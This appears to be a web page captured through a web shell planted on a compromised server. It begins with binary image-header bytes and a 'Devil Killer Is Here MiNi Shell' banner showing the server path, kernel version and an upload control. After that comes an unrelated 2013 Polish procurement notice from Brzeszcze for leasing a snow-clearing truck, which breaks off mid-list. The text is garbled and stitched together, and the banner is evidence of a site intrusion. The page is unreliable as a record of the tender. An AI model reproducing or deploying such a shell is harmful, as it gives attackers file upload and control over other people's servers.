JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130919/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130919/380316-N-2013.html

<p class="kh_header"><b>Brzeszcze: Dostawa (leasing operacyjny) samochodu ciężarowego na podwoziu dwuosiowym fabrycznie nowego z urządzeniem bramowym 
wraz z pługiem odśnieżnym i posypywarko- solarką</b><br>
<b>Numer ogłoszenia: 380316 - 2013; data zamieszczenia: 19.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Komunalna Sp. z o.o. , ul. Kościelna 7, 32-620 Brzeszcze, woj. małopolskie, tel. 032 2111247, faks 032 2111543.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: gminna jednoosobowa jednostka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa (leasing operacyjny) samochodu ciężarowego na podwoziu dwuosiowym fabrycznie nowego z urządzeniem bramowym 
wraz z pługiem odśnieżnym i posypywarko- solarką.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
Dostawa leasing operacyjny samochodu ciężarowego
 na podwoziu dwuosiowym fabrycznie nowego 
z urządzeniem bramowym 
wraz z pługiem odśnieżnym i posypywarko- solarką

Kod CPV 34139100-1
Kod CPV 34143000-1
Kod CPV 34144440-4
Kod CPV 34144510-6

	Wymagania dotyczące leasingu:
	Okres umowy leasingu - 60 miesięcy.
	Wkład własny 25% wartości netto przedmiotu leasingu samochodu ciężarowego rozumiany jako pierwsza podwyższona rata leasingowa wystawiona przez Wykonawcę po podpisaniu protokołu odbioru.
	Opłata końcowa 1% wartości netto przedmiotu leasingu 
samochodu ciężarowego. 
	Preferowany okres spłaty rat leasingowych - do 28 każdego miesiąca. 
	Nie przewiduje się wystąpienia innych dodatkowych kosztów.
	Możliwość wykupu z prawem do pierwokupu.
	Waluta leasingu - polski złoty, raty leasingowe równe, skalkulowane na koszcie zmiennym w oparciu o stawkę referencyjną  WIBOR 1M z dnia ogłoszenia zamówienia.
	Miejsce użytkowania przedmiotu leasingu - Agencja Komunalna Sp. z o.o. ul. Kościelna 7, 32-620 Brzeszcze oraz na terenie całego kraju.

	Wymagania dotyczące podwozia:
	Podwozie fabrycznie nowe, nieużywane, nierejestrowane, rok produkcji 2013, przebieg do 1000km, 2 osiowe, o DMC min. 18000 kg, napęd 4 x 2.
	Kabina dzienna trzyosobowa, w kolorze białym odpowiadająca kolorystyce pojazdów Zamawiającego.
	Kierownica wielofunkcyjna-z opcją tempomat umieszczoną na kole kierownicy, kolumna kierownicy regulowana w dwóch płaszczyznach, blokada położenia umieszczona na kolumnie kierownicy, sterowanie funkcjami komputera pokładowego umieszczone na desce rozdzielczej.
	Klimatyzacja z recyrkulacją powietrza.
	Wywietrznik dachowy.
	Szyba przednia barwiona, osłona przeciwsłoneczna, ogrzewana elektrycznie.
	Pojedyncze okno w tylnej ścianie kabiny.
	Elektrycznie otwierane szyby boczne.
	Lusterko główne i lusterko szerokokątne po stronie kierowcy i zmiennika. Lusterko krawężnikowe po stronie zmiennika.
	Elektryczna regulacja i podgrzewanie lusterek głównych.
	Halogenowe światła przednie z odpornymi na uderzenia kloszami.
	Pneumatyczny fotel kierowcy ze zintegrowanym zagłówkiem 
i trzypunktowym pasem bezpieczeństwa.
	Podwójny fotel zmiennika z pasami.
	Przetwornik z 24V do 12V.
	Tachograf cyfrowy.
	Elektroniczny ogranicznik prędkości do 90.
	Układ 2 głośników.
	Akustyczny, ostrzegawczy sygnał cofania z wyłącznikiem bezpieczeństwa.
	Immobilizer silnika z blokadą wtrysku paliwa i przerwaniem obwodu rozrusznika.
	Przedni zderzak stalowy.
	Oś przednia - paraboliczne zawieszenie piórowe, wyposażone 
w amortyzatory i stabilizator. Maks. obciążenie 7500kg.
	Oś tylna napędzana, z regulowanym zawieszeniem 4 - miechowym, sterowana elektronicznie. Maks. obciążenie 11500kg.
	Rozstaw osi 3750 mm- 3800mm.
	Wentylowane tarcze hamulcowe osi przedniej i tylnej.
	Podwozie wyposażone w układ wskaźników ciśnienia 
w ogumieniu. Ostrzeżenia o ciśnieniu w ogumieniu podawane na wyświetlaczu LCD na tablicy przyrządów.
	Silnik o pojemności min. 6,7litra, 6 cylindrowy, rzędowy,
 4 zawory na cylinder, układ wtryskowy common rail, moc min. 295 KM.
	Norma emisji spalin EURO 5 uzyskane dzięki technologii SCR selektywna redukcja katalityczna.
	Rura wydechowa skierowana do góry.
              Podwozie przystosowane pod zabudowę komunalną.
	System antyblokujacy ABS.
	Koła: R22,5. 
	Zbiornik paliwa nie mniejszy niż 300 litrów.
	Zbiornik AdBlue - min.25 litrów.
	Komputer pokładowy z menu w języku polskim, posiadający min. licznik pracy PTO, zużycie paliwa średnie i chwilowe.
	Podwozie przystosowane do pracy w temperaturach spadających poniżej - 18 oC.
	Sterowanie PTO na desce rozdzielczej, złącze PTO na przedniej przegrodzie kabiny przesyłające sygnały wejściowe stanu włączenia i wyłączenia PTO oraz sygnały stanu PTO i ostrzeżenia PTO.
	Przystawka odbioru mocy dostosowana do wymogów zabudowy.
	Koło zapasowe.
	Centralny zamek z pilotem.
	Listwa oświetleniowa na dachu kabiny.
	Lampa ostrzegawcza zabudowana na stałe z tyłu podwozia 
w miejscu chroniącym przed uszkodzeniem.
	Dywaniki gumowe.
	Trójkąt odblaskowy, apteczka, gaśnica.
	Radio odbiornik i radio CB z instalacjami.
	Rejestrator GPS wraz z oprogramowaniem kompatybilnym 
z systemem będącym w użytkowaniu Zamawiającego XTrack.
	Gwarancja na podwozie 36 miesięcy.
	Do dokumentacji przetargowej należy dostarczyć w języku polskim DTR  dokumentacja techn. - ruchowa jak również zdjęcia oraz foldery - potwierdzające oferowane parametry. 

	Wymagania dotyczące urządzenia bramowego:
	Urządzenie bramowe fabrycznie nowe, nieużywane, rok produkcji 2013.
	Kolor urządzenia bramowego - pomarańczowy odpowiadający kolorystyce pojazdów będących na wyposażeniu Zamawiającego.
	Udźwig urządzenia przy zsuniętych ramionach 10 000 kg.
	Udźwig urządzenia przy maksymalnie wysuniętych ramionach minimum 7 000 kg.
	Możliwość załadunku na maksymalnie wysuniętych ramionach.
	Ramiona wzmocnione z gwarancją możliwości wysokiego wysypywania.
	Możliwość niezależnego sterowania wysuwem ramion.
	Łańcuchy z pełną regulacją ich długości.
	Zaczepy zawiesi łańcuchowych z zabezpieczeniem klapowym.
	Ramiona zamocowane przegubowo na dole bez belki łączącej 
w górnej części.
	Belka przeciw - wjazdowa z tyłu urządzenia bramowego ze stopniem dla operatora.
	Dodatkowy stopień z tyłu pojazdu dla operatora.
	Oświetlenie robocze.
	Długość teleskopowania ramion minimum 1 200 mm.
	Długość ramion po wysunięciu teleskopów 4 000 mm.
	Przygotowanie do montażu posypywarki na platformie urządzenia bramowego.
	Funkcja wysokiego wysypywania zawartości kontenera.
	Ściana ochronna za kabiną kierowcy z kratownicą.
	Drabinka za ścianą ochronną zapewniająca swobodny dostęp do platformy urządzenia z przodu pojazdu.
	Podpoziomowy załadunek kontenera o wartości 800 mm wartość obniżenia terenu - maksymalnie.
	Sterowanie urządzeniem po lewej stronie.
	Sterowanie urządzeniem z kabiny operatora elektro - pneumatyczne.
	Masa własna urządzenia max 2 800 kg.
	Trzy haki wywrotu kontenera z czego środkowy szybko 
- demontowany.
	Regulowanie blokad mechanicznych kontenera do przodu i do tyłu - ręczne.
	Hydrauliczna blokada kontenera 4 punktowa na boki.
	Funkcja szybkiego ruchu do odkładania pustego pojemnika.
	Funkcja płynnego rozruchu uchylania ramion eliminująca efekt rozbujania kontenera.
	Ciśnienie robocze w układnie hydraulicznym minimum 30 Mpa.
	Deklaracja CE.
	Rozdzielacz hydrauliczny HYDROCONTROL.
	Wszystkie siłowniki wykonane z najwyższej jakości materiałów z zastosowanymi zamkami hydraulicznymi, które zabezpieczają przed niekontrolowanym opadnięciem ładunku.
	Zbiornik oleju hydraulicznego ze wskaźnikiem poziomu, temperatury i poziomu zanieczyszczenia oleju w układzie.
	Sterowanie układem hydraulicznym z kabiny kierowcy.
	Sterowanie układem hydraulicznym - CENTRAL STOP - 
z poziomu sterowania za pomocą przycisku awaryjnego STOP.
	Rozdzielacz hydrauliczny osłonięty i zabezpieczony przed uszkodzeniami mechanicznymi.
	Układ elektroniczny umieszczony w szczelnej skrzyni 
i zabezpieczony przed niekorzystnymi warunkami atmosferycznymi.
	Siłownik pneumatyczny podnoszenia i opuszczania haków zaczepowych osłonięty i zabezpieczony przed mechanicznymi uszkodzeniami. 
	Serwis mobilny z czasem reakcji do 24 h od chwili zgłoszenia.
	Gwarancja na urządzenie bramowe 36 miesięcy.
	Do dokumentacji przetargowej należy dostarczyć /w języku polskim/ DTR  dokumentacja techn. - ruchowa jak również zdjęcia oraz foldery - potwierdzające oferowane parametry. 
	Wymagania dotyczące pługu odśnieżnego:
	Pług odśnieżny fabrycznie nowy, nieużywany, rok produkcji 2013.
	Pług odśnieżny z lemieszem jednostronnym z płytą czołową umożliwiającą montaż do wszystkich typów pojazdów 
o odpowiedniej masie wykonanej wg normy DIN 76060.
	Odkładnica wykonana z tworzywa sztucznego trudno ścieralnego o małym współczynniku tarcia oraz odpornego na uderzenia w kolorze pomarańczowym. Wytrzymałość 
i elastyczność materiału tworzywa sztucznego zachowana 
w temperaturze do - 400C.
	Lemiesz zgarniający gumowy tworzący z odkładnicą jedną płaszczyznę zgarniającą śnieg.
	Ciężar kompletnego pługa max 600 kg - łatwy w montażu przez jednego pracownika.
	System uchylny lemiesza - lemiesz mocowany przy pomocy śrub i sprężyn działających na ściskanie, które zabezpieczają go przed uszkodzeniem w przypadku najechania na przeszkodę.
	Oscylacja poprzeczna pługa min. + - 100 umożliwiająca dopasowanie odkładnicy do pochylenia jezdni.
	Skręcanie pługa za pomocą jednego siłownika.
	Realizacja funkcji pracy z kabiny kierowcy przy pomocy pulpitu sterowniczego. Funkcja pracy pługa: podnoszenie, opuszczanie, skręt w lewo/prawo, pływanie, docisk.
	Układ sterowania funkcjami pługa elektrohydrauliczny zamontowany na pługu.
	Wszystkie części stalowe zabezpieczone antykorozyjnie.
	Elementy śruby, nakrętki, sworznie itp. ocynkowane.
	Tłoczyska siłowników: wykonane ze stali szlachetnej.
	Kółka podporowe prowadzące wykonane z pełnej gumy 
z możliwością regulacji wysokości mocowania.
	Oświetlenie robocze - dwie lampy mocowane do konstrukcji pługa, zasilane prądem stałym o napięciu znamionowym 24V.
	Czerwono - białe oświetlenie konturowe.
	Części odkładnicy wystające poza obrys pojazdu oznakowane pasami barwy na przemian białej i czerwonej.
	Parametry pługa: szerokość odkładnicy 3200mm, wysokość H min 1140mm, wysokość H1 min 200mm, promień odkładnicy min 350 mm.
	Szerokość odśnieżania przy skręcie pługa pod kątem 300  2700mm.
	Możliwość montowania czujników elektronicznego systemu monitorowania i pozycjonowania pojazdów bez utraty gwarancji.
	Okres gwarancji 36 miesiące. 
	Serwis mobilny z czasem reakcji do 24 h od chwili zgłoszenia.
	Do dokumentacji przetargowej należy dostarczyć w języku polskim DTR  dokumentacja techn. - ruchowa jak również zdjęcia oraz foldery - potwierdzające oferowane parametry. 

	Wymagania dotyczące posypywarko- solarki:
	Posypywarko - solarka fabrycznie nowa, nieużywana, rok produkcji 2013.
	Zasobnik na materiał uszorstniający, wykonany ze stali węglowej o pojemności  5,0 m3.
	Układ napędowy realizowany od pompy zębatej napędzanej od wałka wentylatora. 
	Bramowy system mocowania posypywarko-solarki.
	Szerokość posypywania od 2,0 m do 12,0 m zmiana co 0,2 m.
	Możliwość posypywania materiałami typu sól, piasek, mieszanka piaskowo-solna lub inny materiał uszorstniający.
	Układ solankowy o pojemności 1800 l.
	Układ solankowy wykonany z dwóch jednokomorowych zbiorników.
	Napęd hydrauliczny taśmy oraz talerza rozsypującego.
	Zakres regulacji gęstości posypywania solą w zakresie do 5 - 40 g/m2- sół zmiana co 1 gram.
	Zakres regulacji gęstości posypywania materiałami uszorstniającymi w zakresie do 30 - 320 g m2 - sół zmiana 1 gram.
	Klapa dozująca ustawiana automatycznie, po wyborze rodzaju wysypywanego materiału, poprzez siłownik hydrauliczny.
	Podawanie materiału uszorstniającego poprzez perforowany przenośnik taśmowy poruszający się po płycie tworzywowej 
o niskim współczynnika tarcia z pominięciem rolek podporowych.
	Krata sita zabezpieczająca przed przedostaniem się dużych frakcji materiałów.
	Regulowana wysokość urządzenia rozsypującego w zależności od rodzaju nośnika.
	Automatyczne wyłączenie posypywania po zatrzymaniu pojazdu.
	Fotoelektryczny czujnik sypania.
	Plandeka ochronna.
	Pulsująca lampa ostrzegawcza w kolorze żółtym oraz światło robocze zamontowane z tyłu posypywarki.
	Układ sterowania z kabiny nośnika - elektryczny jeden pulpit sterowniczy zapewniający:
	uruchomienie  wyłączenie piaskarki ,regulacji szerokości i gęstości sypania wykonywane z tego samego pulpitu,
	pulpit ciekłokrystaliczny z kolorowym wyświetlaczem 
z możliwością ustawienia jego jasności oraz pokrętła wraz z przyciskami funkcyjnymi,
	liczenie czasu pracy urządzenia, ilości wysypanego materiału.
	Ruchomy mechanizm zapobiegający zawieszaniu się materiałów.
	Siłownik elektryczny mechanizmu asymetrii sypania umieszczony w obudowie wykonanej ze stali nierdzewnej.
	Kolor posypywarko-solarki pomarańczowy odpowiadający kolorystyce pojazdów będących na wyposażeniu Zamawiającego.
	Szkolenie operatorów w zakresie eksploatacji i obsługi posypywarek.
	Gwarancja 36 miesiące od daty przekazania posypywarek zamawiającemu z zachowaniem gwarancji na poszczególne elementy posypywarki tj. silniki hydrauliczne, pompy hydrauliczne, itp..
	Serwis mobilny z czasem reakcji do 24 h od chwili zgłoszenia.
	Do dokumentacji przetargowej należy dostarczyć w języku polskim DTR dokumentacja techn. - ruchowa jak również zdjęcia oraz foldery - potwierdzające oferowane parametry..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.13.91.00-1, 34.14.30.00-1, 34.14.44.40-4, 34.14.45.10-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagania dotyczące wadium
	Warunkiem uczestnictwa w przetargu jest wniesienie wadium w wysokości 12.000,00 zł słownie: dwanaście tysięcy złotych 00-100
	Wadium może być wnoszone w jednej lub kilku następujących formach:
	pieniądzu,
	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
	gwarancjach bankowych,
	gwarancjach ubezpieczeniowych,
	poręczeniach udzielanych przez podmioty, o których mowa 
w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r.
o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości
 Dz. U. z 2007 r Nr 42, poz. 275 z późniejszymi zmianami.
	Wadium wnoszone w pieniądzu, należy wpłacić przelewem na konto Agencji Komunalnej w Bank PEKAO S.A. Oddz. Oświęcim 
nr 53 1240 4155 1111 0000 4627 4942.
	Określona kwota musi być na wskazanym koncie Agencji Komunalnej przed terminem składania ofert.
	Wadium wnoszone w innej formie, należy złożyć przed terminem składania ofert, w kasie Agencji Komunalnej, Brzeszcze, ul. Kościelna 7, w godzinach 7.00 - 14.30 a kopie dołączyć do oferty.
	Zwrot wadium nastąpi na warunkach określonych w art. 46 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda złożenia wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych dostaw w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których dostawy zostały wykonane oraz z załączeniem dowodów czy zostały wykonane lub są wykonywane należycie. 
Zamawiający wymaga wykazania co najmniej 1 dostawy odpowiadającej swoim rodzajem i wartością przedmiotu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda złożenia Opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. Zamawiający wymaga, aby kwota ubezpieczenia nie była niższa, niż 1.000.000,00 PLN. Jeżeli z treści załączonej polisy nie wynika fakt jej opłacenia należy dołączyć stosowna kopię zapłaty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zamawiający wymaga wykazania co najmniej 1 dostawy odpowiadającej swoim rodzajem i wartością przedmiotu zamówienia.;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

